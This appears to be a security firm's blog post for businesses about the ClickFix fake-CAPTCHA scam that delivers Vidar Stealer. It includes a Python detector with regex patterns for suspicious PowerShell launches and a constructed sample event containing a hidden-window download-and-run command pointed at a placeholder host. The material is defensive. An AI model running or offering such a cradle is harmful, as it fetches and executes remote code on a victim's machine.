
ClickFix is a scam that tricks you into running a malicious command on your own computer. You land on a normal-looking web page, see a fake “Verify that you are human” prompt, and when you click it, a pop-up tells you to paste something into Windows PowerShell or the Run box “to fix” the page. That pasted text is malware. The sneaky part: the page has already copied the command to your clipboard, so you are simply told to paste it and press Enter.

The ACSC has warned that ClickFix is being used right now against Australian businesses to deliver Vidar Stealer, malware that grabs saved passwords and login tokens. What makes this campaign local is the delivery: attackers are injecting the fake CAPTCHA into compromised WordPress sites belonging to legitimate Australian businesses. So the booby-trapped page can be a real company’s website that has been hacked — not an obviously dodgy link. The usual “don’t click suspicious links” advice misses it, because the victim runs the dangerous part themselves.

Two things follow for your business. First, train your team on one simple rule: no legitimate website will ever ask you to paste a command into PowerShell or Terminal — if one does, close the tab. Second, if you run a WordPress site, keep it patched and remove unused themes and plugins, because that is how attackers get in to plant the trap. On work devices, restricting who can run scripts stops the command even if someone is fooled.
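For the IT person watching the logs, here is an added example (not part of the original post or the ACSC advisory) of how the pattern described above shows up: a script host started by explorer.exe, which is what pasting into the Run box produces, with a hidden-window flag, an encoded command, or a download-and-run cradle on its command line. The heuristics, the Sysmon-like field names and the sample events are constructed for illustration.

```python
"""Flag ClickFix-style launches in constructed process-creation events."""
import re

# Script hosts a pasted ClickFix command typically lands in (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Command-line indicators; names are ours, regexes are illustrative heuristics.
INDICATORS = [
    ("hidden_window", re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b.*\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta_remote", re.compile(r"\bmshta\b.*https?://", re.I)),
]


def classify(event):
    """Return the indicator names that fire for one event; empty means no alert."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    # Only a user-driven launch (parent explorer.exe = Run box / Start menu) counts.
    if image not in SCRIPT_HOSTS or parent != "explorer.exe":
        return []
    return [name for name, rx in INDICATORS if rx.search(event["CommandLine"])]


def detect(events):
    """Return (index, indicators) for every event that looks like ClickFix."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed samples, not real telemetry
    # A user pasted a fake-CAPTCHA "fix" into Win+R; URL is a reserved test domain.
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm http://example.invalid/v | iex"'},
    # An admin opened PowerShell from the Start menu: explorer parent, plain command line.
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    # A scheduled task runs a hidden script: suspicious flag, but not a user-driven launch.
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -w hidden -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for i, hits in detect(SAMPLE_EVENTS):
        print(f"event {i}: ClickFix-style launch, indicators: {', '.join(hits)}")
```

Only the first sample fires; the other two show why the explorer.exe parent check matters for keeping noise down.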

If you would like a hand locking down staff devices or your WordPress site, that is part of what our managed cybersecurity and security awareness training cover.
